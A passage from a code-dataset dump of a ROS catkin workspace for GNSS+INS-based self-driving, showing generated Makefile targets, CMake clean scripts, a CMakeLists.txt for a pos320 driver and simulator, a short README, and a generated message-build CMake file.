path/CMakeFiles/roscpp_generate_messages_nodejs.dir/build\n.PHONY : roscpp_generate_messages_nodejs/fast\n\n# Convenience name for target.\npath/CMakeFiles/roscpp_generate_messages_lisp.dir/rule:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f CMakeFiles/Makefile2 path/CMakeFiles/roscpp_generate_messages_lisp.dir/rule\n.PHONY : path/CMakeFiles/roscpp_generate_messages_lisp.dir/rule\n\n# Convenience name for target.\nroscpp_generate_messages_lisp: path/CMakeFiles/roscpp_generate_messages_lisp.dir/rule\n\n.PHONY : roscpp_generate_messages_lisp\n\n# fast build rule for target.\nroscpp_generate_messages_lisp/fast:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f path/CMakeFiles/roscpp_generate_messages_lisp.dir/build.make path/CMakeFiles/roscpp_generate_messages_lisp.dir/build\n.PHONY : roscpp_generate_messages_lisp/fast\n\n# Convenience name for target.\npath/CMakeFiles/path_geneus.dir/rule:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f CMakeFiles/Makefile2 path/CMakeFiles/path_geneus.dir/rule\n.PHONY : path/CMakeFiles/path_geneus.dir/rule\n\n# Convenience name for target.\npath_geneus: path/CMakeFiles/path_geneus.dir/rule\n\n.PHONY : path_geneus\n\n# fast build rule for target.\npath_geneus/fast:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f path/CMakeFiles/path_geneus.dir/build.make path/CMakeFiles/path_geneus.dir/build\n.PHONY : path_geneus/fast\n\n# Convenience name for target.\npath/CMakeFiles/rosgraph_msgs_generate_messages_nodejs.dir/rule:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f CMakeFiles/Makefile2 path/CMakeFiles/rosgraph_msgs_generate_messages_nodejs.dir/rule\n.PHONY : path/CMakeFiles/rosgraph_msgs_generate_messages_nodejs.dir/rule\n\n# Convenience name for target.\nrosgraph_msgs_generate_messages_nodejs: path/CMakeFiles/rosgraph_msgs_generate_messages_nodejs.dir/rule\n\n.PHONY : rosgraph_msgs_generate_messages_nodejs\n\n# fast build rule for target.\nrosgraph_msgs_generate_messages_nodejs/fast:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f path/CMakeFiles/rosgraph_msgs_generate_messages_nodejs.dir/build.make path/CMakeFiles/rosgraph_msgs_generate_messages_nodejs.dir/build\n.PHONY : rosgraph_msgs_generate_messages_nodejs/fast\n\n# Convenience name for target.\npath/CMakeFiles/nav_msgs_generate_messages_cpp.dir/rule:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f CMakeFiles/Makefile2 path/CMakeFiles/nav_msgs_generate_messages_cpp.dir/rule\n.PHONY : path/CMakeFiles/nav_msgs_generate_messages_cpp.dir/rule\n\n# Convenience name for target.\nnav_msgs_generate_messages_cpp: path/CMakeFiles/nav_msgs_generate_messages_cpp.dir/rule\n\n.PHONY : nav_msgs_generate_messages_cpp\n\n# fast build rule for target.\nnav_msgs_generate_messages_cpp/fast:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f path/CMakeFiles/nav_msgs_generate_messages_cpp.dir/build.make path/CMakeFiles/nav_msgs_generate_messages_cpp.dir/build\n.PHONY : nav_msgs_generate_messages_cpp/fast\n\n# Convenience name for target.\npath/CMakeFiles/actionlib_msgs_generate_messages_cpp.dir/rule:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f CMakeFiles/Makefile2 path/CMakeFiles/actionlib_msgs_generate_messages_cpp.dir/rule\n.PHONY : path/CMakeFiles/actionlib_msgs_generate_messages_cpp.dir/rule\n\n# Convenience name for target.\nactionlib_msgs_generate_messages_cpp: path/CMakeFiles/actionlib_msgs_generate_messages_cpp.dir/rule\n\n.PHONY : actionlib_msgs_generate_messages_cpp\n\n# fast build rule for target.\nactionlib_msgs_generate_messages_cpp/fast:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f path/CMakeFiles/actionlib_msgs_generate_messages_cpp.dir/build.make path/CMakeFiles/actionlib_msgs_generate_messages_cpp.dir/build\n.PHONY : actionlib_msgs_generate_messages_cpp/fast\n\n# Convenience name for target.\npath/CMakeFiles/nav_msgs_generate_messages_eus.dir/rule:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f CMakeFiles/Makefile2 path/CMakeFiles/nav_msgs_generate_messages_eus.dir/rule\n.PHONY : path/CMakeFiles/nav_msgs_generate_messages_eus.dir/rule\n\n# Convenience name for target.\nnav_msgs_generate_messages_eus: path/CMakeFiles/nav_msgs_generate_messages_eus.dir/rule\n\n.PHONY : nav_msgs_generate_messages_eus\n\n# fast build rule for target.\nnav_msgs_generate_messages_eus/fast:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f path/CMakeFiles/nav_msgs_generate_messages_eus.dir/build.make path/CMakeFiles/nav_msgs_generate_messages_eus.dir/build\n.PHONY : nav_msgs_generate_messages_eus/fast\n\n# Convenience name for target.\npath/CMakeFiles/nav_msgs_generate_messages_lisp.dir/rule:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f CMakeFiles/Makefile2 path/CMakeFiles/nav_msgs_generate_messages_lisp.dir/rule\n.PHONY : path/CMakeFiles/nav_msgs_generate_messages_lisp.dir/rule\n\n# Convenience name for target.\nnav_msgs_generate_messages_lisp: path/CMakeFiles/nav_msgs_generate_messages_lisp.dir/rule\n\n.PHONY : nav_msgs_generate_messages_lisp\n\n# fast build rule for target.\nnav_msgs_generate_messages_lisp/fast:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f path/CMakeFiles/nav_msgs_generate_messages_lisp.dir/build.make path/CMakeFiles/nav_msgs_generate_messages_lisp.dir/build\n.PHONY : nav_msgs_generate_messages_lisp/fast\n\n# Convenience name for target.\npath/CMakeFiles/path_generate_messages.dir/rule:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f CMakeFiles/Makefile2 path/CMakeFiles/path_generate_messages.dir/rule\n.PHONY : path/CMakeFiles/path_generate_messages.dir/rule\n\n# Convenience name for target.\npath_generate_messages: path/CMakeFiles/path_generate_messages.dir/rule\n\n.PHONY : path_generate_messages\n\n# fast build rule for target.\npath_generate_messages/fast:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f path/CMakeFiles/path_generate_messages.dir/build.make path/CMakeFiles/path_generate_messages.dir/build\n.PHONY : path_generate_messages/fast\n\n# Convenience name for target.\npath/CMakeFiles/nav_msgs_generate_messages_nodejs.dir/rule:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f CMakeFiles/Makefile2 path/CMakeFiles/nav_msgs_generate_messages_nodejs.dir/rule\n.PHONY : path/CMakeFiles/nav_msgs_generate_messages_nodejs.dir/rule\n\n# Convenience name for target.\nnav_msgs_generate_messages_nodejs: path/CMakeFiles/nav_msgs_generate_messages_nodejs.dir/rule\n\n.PHONY : nav_msgs_generate_messages_nodejs\n\n# fast build rule for target.\nnav_msgs_generate_messages_nodejs/fast:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f path/CMakeFiles/nav_msgs_generate_messages_nodejs.dir/build.make path/CMakeFiles/nav_msgs_generate_messages_nodejs.dir/build\n.PHONY : nav_msgs_generate_messages_nodejs/fast\n\n# Convenience name for target.\npath/CMakeFiles/roscpp_generate_messages_cpp.dir/rule:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f CMakeFiles/Makefile2 path/CMakeFiles/roscpp_generate_messages_cpp.dir/rule\n.PHONY : path/CMakeFiles/roscpp_generate_messages_cpp.dir/rule\n\n# Convenience name for target.\nroscpp_generate_messages_cpp: path/CMakeFiles/roscpp_generate_messages_cpp.dir/rule\n\n.PHONY : roscpp_generate_messages_cpp\n\n# fast build rule for target.\nroscpp_generate_messages_cpp/fast:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f path/CMakeFiles/roscpp_generate_messages_cpp.dir/build.make path/CMakeFiles/roscpp_generate_messages_cpp.dir/build\n.PHONY : roscpp_generate_messages_cpp/fast\n\n# Convenience name for target.\npath/CMakeFiles/actionlib_msgs_generate_messages_py.dir/rule:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f CMakeFiles/Makefile2 path/CMakeFiles/actionlib_msgs_generate_messages_py.dir/rule\n.PHONY : path/CMakeFiles/actionlib_msgs_generate_messages_py.dir/rule\n\n# Convenience name for target.\nactionlib_msgs_generate_messages_py: path/CMakeFiles/actionlib_msgs_generate_messages_py.dir/rule\n\n.PHONY : actionlib_msgs_generate_messages_py\n\n# fast build rule for target.\nactionlib_msgs_generate_messages_py/fast:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f path/CMakeFiles/actionlib_msgs_generate_messages_py.dir/build.make path/CMakeFiles/actionlib_msgs_generate_messages_py.dir/build\n.PHONY : actionlib_msgs_generate_messages_py/fast\n\n# Convenience name for target.\npath/CMakeFiles/nav_msgs_generate_messages_py.dir/rule:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f CMakeFiles/Makefile2 path/CMakeFiles/nav_msgs_generate_messages_py.dir/rule\n.PHONY : path/CMakeFiles/nav_msgs_generate_messages_py.dir/rule\n\n# Convenience name for target.\nnav_msgs_generate_messages_py: path/CMakeFiles/nav_msgs_generate_messages_py.dir/rule\n\n.PHONY : nav_msgs_generate_messages_py\n\n# fast build rule for target.\nnav_msgs_generate_messages_py/fast:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f path/CMakeFiles/nav_msgs_generate_messages_py.dir/build.make path/CMakeFiles/nav_msgs_generate_messages_py.dir/build\n.PHONY : nav_msgs_generate_messages_py/fast\n\n# Convenience name for target.\npath/CMakeFiles/actionlib_msgs_generate_messages_lisp.dir/rule:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f CMakeFiles/Makefile2 path/CMakeFiles/actionlib_msgs_generate_messages_lisp.dir/rule\n.PHONY : path/CMakeFiles/actionlib_msgs_generate_messages_lisp.dir/rule\n\n# Convenience name for target.\nactionlib_msgs_generate_messages_lisp: path/CMakeFiles/actionlib_msgs_generate_messages_lisp.dir/rule\n\n.PHONY : actionlib_msgs_generate_messages_lisp\n\n# fast build rule for target.\nactionlib_msgs_generate_messages_lisp/fast:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f path/CMakeFiles/actionlib_msgs_generate_messages_lisp.dir/build.make path/CMakeFiles/actionlib_msgs_generate_messages_lisp.dir/build\n.PHONY : actionlib_msgs_generate_messages_lisp/fast\n\n# Convenience name for target.\npath/CMakeFiles/actionlib_msgs_generate_messages_nodejs.dir/rule:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f CMakeFiles/Makefile2 path/CMakeFiles/actionlib_msgs_generate_messages_nodejs.dir/rule\n.PHONY : path/CMakeFiles/actionlib_msgs_generate_messages_nodejs.dir/rule\n\n# Convenience name for target.\nactionlib_msgs_generate_messages_nodejs: path/CMakeFiles/actionlib_msgs_generate_messages_nodejs.dir/rule\n\n.PHONY : actionlib_msgs_generate_messages_nodejs\n\n# fast build rule for target.\nactionlib_msgs_generate_messages_nodejs/fast:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f path/CMakeFiles/actionlib_msgs_generate_messages_nodejs.dir/build.make path/CMakeFiles/actionlib_msgs_generate_messages_nodejs.dir/build\n.PHONY : actionlib_msgs_generate_messages_nodejs/fast\n\nsrc/gps_planner.o: src/gps_planner.cpp.o\n\n.PHONY : src/gps_planner.o\n\n# target to build an object file\nsrc/gps_planner.cpp.o:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f path/CMakeFiles/gps_planner.dir/build.make path/CMakeFiles/gps_planner.dir/src/gps_planner.cpp.o\n.PHONY : src/gps_planner.cpp.o\n\nsrc/gps_planner.i: src/gps_planner.cpp.i\n\n.PHONY : src/gps_planner.i\n\n# target to preprocess a source file\nsrc/gps_planner.cpp.i:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f path/CMakeFiles/gps_planner.dir/build.make path/CMakeFiles/gps_planner.dir/src/gps_planner.cpp.i\n.PHONY : src/gps_planner.cpp.i\n\nsrc/gps_planner.s: src/gps_planner.cpp.s\n\n.PHONY : src/gps_planner.s\n\n# target to generate assembly for a file\nsrc/gps_planner.cpp.s:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f path/CMakeFiles/gps_planner.dir/build.make path/CMakeFiles/gps_planner.dir/src/gps_planner.cpp.s\n.PHONY : src/gps_planner.cpp.s\n\n# Help Target\nhelp:\n\t@echo \"The following are some of the valid targets for this Makefile:\"\n\t@echo \"... all (the default if no target is provided)\"\n\t@echo \"... clean\"\n\t@echo \"... depend\"\n\t@echo \"... list_install_components\"\n\t@echo \"... edit_cache\"\n\t@echo \"... test\"\n\t@echo \"... install/strip\"\n\t@echo \"... rebuild_cache\"\n\t@echo \"... gps_planner\"\n\t@echo \"... path_genpy\"\n\t@echo \"... path_generate_messages_nodejs\"\n\t@echo \"... path_genlisp\"\n\t@echo \"... path_generate_messages_lisp\"\n\t@echo \"... path_generate_messages_eus\"\n\t@echo \"... path_gencpp\"\n\t@echo \"... rosgraph_msgs_generate_messages_cpp\"\n\t@echo \"... path_generate_messages_cpp\"\n\t@echo \"... path_gennodejs\"\n\t@echo \"... roscpp_generate_messages_py\"\n\t@echo \"... rosgraph_msgs_generate_messages_eus\"\n\t@echo \"... actionlib_msgs_generate_messages_eus\"\n\t@echo \"... path_generate_messages_py\"\n\t@echo \"... roscpp_generate_messages_eus\"\n\t@echo \"... rosgraph_msgs_generate_messages_py\"\n\t@echo \"... rosgraph_msgs_generate_messages_lisp\"\n\t@echo \"... roscpp_generate_messages_nodejs\"\n\t@echo \"... roscpp_generate_messages_lisp\"\n\t@echo \"... path_geneus\"\n\t@echo \"... rosgraph_msgs_generate_messages_nodejs\"\n\t@echo \"... nav_msgs_generate_messages_cpp\"\n\t@echo \"... actionlib_msgs_generate_messages_cpp\"\n\t@echo \"... nav_msgs_generate_messages_eus\"\n\t@echo \"... install\"\n\t@echo \"... nav_msgs_generate_messages_lisp\"\n\t@echo \"... path_generate_messages\"\n\t@echo \"... nav_msgs_generate_messages_nodejs\"\n\t@echo \"... roscpp_generate_messages_cpp\"\n\t@echo \"... actionlib_msgs_generate_messages_py\"\n\t@echo \"... install/local\"\n\t@echo \"... nav_msgs_generate_messages_py\"\n\t@echo \"... actionlib_msgs_generate_messages_lisp\"\n\t@echo \"... actionlib_msgs_generate_messages_nodejs\"\n\t@echo \"... src/gps_planner.o\"\n\t@echo \"... src/gps_planner.i\"\n\t@echo \"... src/gps_planner.s\"\n.PHONY : help\n\n\n\n#=============================================================================\n# Special targets to cleanup operation of make.\n\n# Special rule to run CMake to check the build system integrity.\n# No rule that depends on this can have commands that come from listfiles\n# because they might be regenerated.\ncmake_check_build_system:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(CMAKE_COMMAND) -H$(CMAKE_SOURCE_DIR) -B$(CMAKE_BINARY_DIR) --check-build-system CMakeFiles/Makefile.cmake 0\n.PHONY : cmake_check_build_system\n\n"
},
{
"alpha_fraction": 0.7633410692214966,
"alphanum_fraction": 0.7911832928657532,
"avg_line_length": 42.099998474121094,
"blob_id": "e05181532a938eaaa407193657a87dbbdbc22937",
"content_id": "e0636ff26307ef38c8565ab3ea0eb39b5af6ac3b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "CMake",
"length_bytes": 431,
"license_type": "no_license",
"max_line_length": 94,
"num_lines": 10,
"path": "/build/zf_msgs/CMakeFiles/zf_msgs_generate_messages_nodejs.dir/cmake_clean.cmake",
"repo_name": "chouer19/zhuifengShow0919",
"src_encoding": "UTF-8",
"text": "file(REMOVE_RECURSE\n \"CMakeFiles/zf_msgs_generate_messages_nodejs\"\n \"/home/zf/xuechong_ws/zhuifengShow0919/devel/share/gennodejs/ros/zf_msgs/msg/pos320.js\"\n \"/home/zf/xuechong_ws/zhuifengShow0919/devel/share/gennodejs/ros/zf_msgs/msg/pose2dArray.js\"\n)\n\n# Per-language clean rules from dependency scanning.\nforeach(lang )\n include(CMakeFiles/zf_msgs_generate_messages_nodejs.dir/cmake_clean_${lang}.cmake OPTIONAL)\nendforeach()\n"
},
{
"alpha_fraction": 0.5832037329673767,
"alphanum_fraction": 0.5902021527290344,
"avg_line_length": 27.577777862548828,
"blob_id": "e0a89e63b738fc568b2e4b8cdce65f7362837af8",
"content_id": "20451a0d852955306da227e2071f9b8dff0ecb67",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "CMake",
"length_bytes": 1286,
"license_type": "no_license",
"max_line_length": 63,
"num_lines": 45,
"path": "/src/pos320/CMakeLists.txt",
"repo_name": "chouer19/zhuifengShow0919",
"src_encoding": "UTF-8",
"text": "# %Tag(FULLTEXT)%\ncmake_minimum_required(VERSION 2.8.3)\nproject(pos320)\n\n## Find catkin and any catkin packages\nfind_package(catkin REQUIRED COMPONENTS \n roscpp\n rospy\n std_msgs\n nav_msgs\n geometry_msgs\n genmsg\n zf_msgs\n)\n\nFIND_PACKAGE(Boost COMPONENTS system thread REQUIRED)\n\n## Declare ROS messages and services\n#add_message_files(FILES Num.msg)\n# add_service_files(FILES AddTwoInts.srv)\n\n## Generate added messages and services\ngenerate_messages(DEPENDENCIES std_msgs)\n\n## Declare a catkin package\ncatkin_package()\n\n## Build talker and listener\ninclude_directories(include ${catkin_INCLUDE_DIRS})\n\nadd_executable(driver src/driver.cpp)\nadd_executable(simulator src/simulator.cpp)\ntarget_link_libraries(driver \n ${catkin_LIBRARIES}\n ${Boost_SYSTEM_LIBRARY}\n ${Boost_THREAD_LIBRARY}\n )\ntarget_link_libraries(simulator\n ${catkin_LIBRARIES}\n ${Boost_SYSTEM_LIBRARY}\n ${Boost_THREAD_LIBRARY}\n )\nadd_dependencies(simulator driver pos320_generate_messages_cpp)\n\n# %EndTag(FULLTEXT)%\n"
},
{
"alpha_fraction": 0.7453703880310059,
"alphanum_fraction": 0.7731481194496155,
"avg_line_length": 26,
"blob_id": "c02387dc030c5ecc2d597d90e7f46983b06399a2",
"content_id": "c089755ec7ba17c078c4caa900622af9d654987c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 216,
"license_type": "no_license",
"max_line_length": 68,
"num_lines": 8,
"path": "/README.md",
"repo_name": "chouer19/zhuifengShow0919",
"src_encoding": "UTF-8",
"text": "## Self-driving for only GNSS+INS navigation\n\n# GNSS+INS,WuHan MAP Time Space,pos320\n src/pos320/ includes driver, reading serial port using boost::asio\n\n# pure pursuit algorithm for path following\n\n# path planning\n"
},
{
"alpha_fraction": 0.768539309501648,
"alphanum_fraction": 0.7688603401184082,
"avg_line_length": 29.09661865234375,
"blob_id": "3ad897dffba01e28d716e866a45acc1a9a913e6e",
"content_id": "9ebbee0991591aa434c83a026ff4b266df9761af",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "CMake",
"length_bytes": 6230,
"license_type": "no_license",
"max_line_length": 129,
"num_lines": 207,
"path": "/build/path/cmake/path-genmsg.cmake",
"repo_name": "chouer19/zhuifengShow0919",
"src_encoding": "UTF-8",
"text": "# generated from genmsg/cmake/pkg-genmsg.cmake.em\n\nmessage(WARNING \"Invoking generate_messages() without having added any message or service file before.\nYou should either add add_message_files() and/or add_service_files() calls or remove the invocation of generate_messages().\")\nmessage(STATUS \"path: 0 messages, 0 services\")\n\nset(MSG_I_FLAGS \"-Istd_msgs:/opt/ros/kinetic/share/std_msgs/cmake/../msg\")\n\n# Find all generators\nfind_package(gencpp REQUIRED)\nfind_package(geneus REQUIRED)\nfind_package(genlisp REQUIRED)\nfind_package(gennodejs REQUIRED)\nfind_package(genpy REQUIRED)\n\nadd_custom_target(path_generate_messages ALL)\n\n# verify that message/service dependencies have not changed since configure\n\n\n\n#\n# langs = gencpp;geneus;genlisp;gennodejs;genpy\n#\n\n### Section generating for lang: gencpp\n### Generating Messages\n\n### Generating Services\n\n### Generating Module File\n_generate_module_cpp(path\n ${CATKIN_DEVEL_PREFIX}/${gencpp_INSTALL_DIR}/path\n \"${ALL_GEN_OUTPUT_FILES_cpp}\"\n)\n\nadd_custom_target(path_generate_messages_cpp\n DEPENDS ${ALL_GEN_OUTPUT_FILES_cpp}\n)\nadd_dependencies(path_generate_messages path_generate_messages_cpp)\n\n# add dependencies to all check dependencies targets\n\n# target for backward compatibility\nadd_custom_target(path_gencpp)\nadd_dependencies(path_gencpp path_generate_messages_cpp)\n\n# register target for catkin_package(EXPORTED_TARGETS)\nlist(APPEND ${PROJECT_NAME}_EXPORTED_TARGETS path_generate_messages_cpp)\n\n### Section generating for lang: geneus\n### Generating Messages\n\n### Generating Services\n\n### Generating Module File\n_generate_module_eus(path\n ${CATKIN_DEVEL_PREFIX}/${geneus_INSTALL_DIR}/path\n \"${ALL_GEN_OUTPUT_FILES_eus}\"\n)\n\nadd_custom_target(path_generate_messages_eus\n DEPENDS ${ALL_GEN_OUTPUT_FILES_eus}\n)\nadd_dependencies(path_generate_messages path_generate_messages_eus)\n\n# add dependencies to all check dependencies targets\n\n# target for backward compatibility\nadd_custom_target(path_geneus)\nadd_dependencies(path_geneus path_generate_messages_eus)\n\n# register target for catkin_package(EXPORTED_TARGETS)\nlist(APPEND ${PROJECT_NAME}_EXPORTED_TARGETS path_generate_messages_eus)\n\n### Section generating for lang: genlisp\n### Generating Messages\n\n### Generating Services\n\n### Generating Module File\n_generate_module_lisp(path\n ${CATKIN_DEVEL_PREFIX}/${genlisp_INSTALL_DIR}/path\n \"${ALL_GEN_OUTPUT_FILES_lisp}\"\n)\n\nadd_custom_target(path_generate_messages_lisp\n DEPENDS ${ALL_GEN_OUTPUT_FILES_lisp}\n)\nadd_dependencies(path_generate_messages path_generate_messages_lisp)\n\n# add dependencies to all check dependencies targets\n\n# target for backward compatibility\nadd_custom_target(path_genlisp)\nadd_dependencies(path_genlisp path_generate_messages_lisp)\n\n# register target for catkin_package(EXPORTED_TARGETS)\nlist(APPEND ${PROJECT_NAME}_EXPORTED_TARGETS path_generate_messages_lisp)\n\n### Section generating for lang: gennodejs\n### Generating Messages\n\n### Generating Services\n\n### Generating Module File\n_generate_module_nodejs(path\n ${CATKIN_DEVEL_PREFIX}/${gennodejs_INSTALL_DIR}/path\n \"${ALL_GEN_OUTPUT_FILES_nodejs}\"\n)\n\nadd_custom_target(path_generate_messages_nodejs\n DEPENDS ${ALL_GEN_OUTPUT_FILES_nodejs}\n)\nadd_dependencies(path_generate_messages path_generate_messages_nodejs)\n\n# add dependencies to all check dependencies targets\n\n# target for backward compatibility\nadd_custom_target(path_gennodejs)\nadd_dependencies(path_gennodejs path_generate_messages_nodejs)\n\n# register target for catkin_package(EXPORTED_TARGETS)\nlist(APPEND ${PROJECT_NAME}_EXPORTED_TARGETS path_generate_messages_nodejs)\n\n### Section generating for lang: genpy\n### Generating Messages\n\n### Generating Services\n\n### Generating Module File\n_generate_module_py(path\n ${CATKIN_DEVEL_PREFIX}/${genpy_INSTALL_DIR}/path\n \"${ALL_GEN_OUTPUT_FILES_py}\"\n)\n\nadd_custom_target(path_generate_messages_py\n DEPENDS ${ALL_GEN_OUTPUT_FILES_py}\n)\nadd_dependencies(path_generate_messages path_generate_messages_py)\n\n# add dependencies to all check dependencies targets\n\n# target for backward compatibility\nadd_custom_target(path_genpy)\nadd_dependencies(path_genpy path_generate_messages_py)\n\n# register target for catkin_package(EXPORTED_TARGETS)\nlist(APPEND ${PROJECT_NAME}_EXPORTED_TARGETS path_generate_messages_py)\n\n\n\nif(gencpp_INSTALL_DIR AND EXISTS ${CATKIN_DEVEL_PREFIX}/${gencpp_INSTALL_DIR}/path)\n # install generated code\n install(\n DIRECTORY ${CATKIN_DEVEL_PREFIX}/${gencpp_INSTALL_DIR}/path\n DESTINATION ${gencpp_INSTALL_DIR}\n )\nendif()\nif(TARGET std_msgs_generate_messages_cpp)\n add_dependencies(path_generate_messages_cpp std_msgs_generate_messages_cpp)\nendif()\n\nif(geneus_INSTALL_DIR AND EXISTS ${CATKIN_DEVEL_PREFIX}/${geneus_INSTALL_DIR}/path)\n # install generated code\n install(\n DIRECTORY ${CATKIN_DEVEL_PREFIX}/${geneus_INSTALL_DIR}/path\n DESTINATION ${geneus_INSTALL_DIR}\n )\nendif()\nif(TARGET std_msgs_generate_messages_eus)\n add_dependencies(path_generate_messages_eus std_msgs_generate_messages_eus)\nendif()\n\nif(genlisp_INSTALL_DIR AND EXISTS ${CATKIN_DEVEL_PREFIX}/${genlisp_INSTALL_DIR}/path)\n # install generated code\n install(\n DIRECTORY ${CATKIN_DEVEL_PREFIX}/${genlisp_INSTALL_DIR}/path\n DESTINATION ${genlisp_INSTALL_DIR}\n )\nendif()\nif(TARGET std_msgs_generate_messages_lisp)\n add_dependencies(path_generate_messages_lisp std_msgs_generate_messages_lisp)\nendif()\n\nif(gennodejs_INSTALL_DIR AND EXISTS ${CATKIN_DEVEL_PREFIX}/${gennodejs_INSTALL_DIR}/path)\n # install generated code\n install(\n DIRECTORY ${CATKIN_DEVEL_PREFIX}/${gennodejs_INSTALL_DIR}/path\n DESTINATION ${gennodejs_INSTALL_DIR}\n )\nendif()\nif(TARGET std_msgs_generate_messages_nodejs)\n add_dependencies(path_generate_messages_nodejs std_msgs_generate_messages_nodejs)\nendif()\n\nif(genpy_INSTALL_DIR AND EXISTS ${CATKIN_DEVEL_PREFIX}/${genpy_INSTALL_DIR}/path)\n install(CODE \"execute_process(COMMAND \\\"/usr/bin/python\\\" -m compileall \\\"${CATKIN_DEVEL_PREFIX}/${genpy_INSTALL_DIR}/path\\\")\")\n # install generated code\n install(\n DIRECTORY ${CATKIN_DEVEL_PREFIX}/${genpy_INSTALL_DIR}/path\n DESTINATION ${genpy_INSTALL_DIR}\n )\nendif()\nif(TARGET std_msgs_generate_messages_py)\n add_dependencies(path_generate_messages_py std_msgs_generate_messages_py)\nendif()\n"
},
{
"alpha_fraction": 0.7356746792793274,
"alphanum_fraction": 0.776340126991272,
"avg_line_length": 48.181819915771484,
"blob_id": "561c5aa473a4b9e0c2d7b3f7d87f7590c10dd7b3",
"content_id": "cd744eb6a9427206518aede14c3ab263c2d8bf6e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "CMake",
"length_bytes": 541,
"license_type": "no_license",
"max_line_length": 103,
"num_lines": 11,
"path": "/build/zf_msgs/CMakeFiles/zf_msgs_generate_messages_py.dir/cmake_clean.cmake",
"repo_name": "chouer19/zhuifengShow0919",
"src_encoding": "UTF-8",
"text": "file(REMOVE_RECURSE\n \"CMakeFiles/zf_msgs_generate_messages_py\"\n \"/home/zf/xuechong_ws/zhuifengShow0919/devel/lib/python2.7/dist-packages/zf_msgs/msg/_pos320.py\"\n \"/home/zf/xuechong_ws/zhuifengShow0919/devel/lib/python2.7/dist-packages/zf_msgs/msg/_pose2dArray.py\"\n \"/home/zf/xuechong_ws/zhuifengShow0919/devel/lib/python2.7/dist-packages/zf_msgs/msg/__init__.py\"\n)\n\n# Per-language clean rules from dependency scanning.\nforeach(lang )\n include(CMakeFiles/zf_msgs_generate_messages_py.dir/cmake_clean_${lang}.cmake OPTIONAL)\nendforeach()\n"
},
{
"alpha_fraction": 0.7433722019195557,
"alphanum_fraction": 0.7879109382629395,
"avg_line_length": 61.86666488647461,
"blob_id": "a4bd9136308c3cf698be03fd2c791e911c1ce6b0",
"content_id": "48b3225996d9020aad2bd4b250b3f421afbb9ea4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "CMake",
"length_bytes": 943,
"license_type": "no_license",
"max_line_length": 108,
"num_lines": 15,
"path": "/build/zfmsg/CMakeFiles/zfmsg_generate_messages_py.dir/cmake_clean.cmake",
"repo_name": "chouer19/zhuifengShow0919",
"src_encoding": "UTF-8",
"text": "file(REMOVE_RECURSE\n \"CMakeFiles/zfmsg_generate_messages_py\"\n \"/home/zf/xuechong_ws/zhuifengShow0919/devel/lib/python2.7/dist-packages/zfmsg/msg/_BreakStatus.py\"\n \"/home/zf/xuechong_ws/zhuifengShow0919/devel/lib/python2.7/dist-packages/zfmsg/msg/_SteerStatus.py\"\n \"/home/zf/xuechong_ws/zhuifengShow0919/devel/lib/python2.7/dist-packages/zfmsg/msg/_ThrottleGearStatus.py\"\n \"/home/zf/xuechong_ws/zhuifengShow0919/devel/lib/python2.7/dist-packages/zfmsg/msg/_MotionCmd.py\"\n \"/home/zf/xuechong_ws/zhuifengShow0919/devel/lib/python2.7/dist-packages/zfmsg/msg/_CanInfo.py\"\n \"/home/zf/xuechong_ws/zhuifengShow0919/devel/lib/python2.7/dist-packages/zfmsg/msg/_CanInfoAW.py\"\n \"/home/zf/xuechong_ws/zhuifengShow0919/devel/lib/python2.7/dist-packages/zfmsg/msg/__init__.py\"\n)\n\n# Per-language clean rules from dependency scanning.\nforeach(lang )\n include(CMakeFiles/zfmsg_generate_messages_py.dir/cmake_clean_${lang}.cmake OPTIONAL)\nendforeach()\n"
},
{
"alpha_fraction": 0.7564767003059387,
"alphanum_fraction": 0.7564767003059387,
"avg_line_length": 47.25,
"blob_id": "b94e0ca3ce341788838ba9ca968b8f78881604bb",
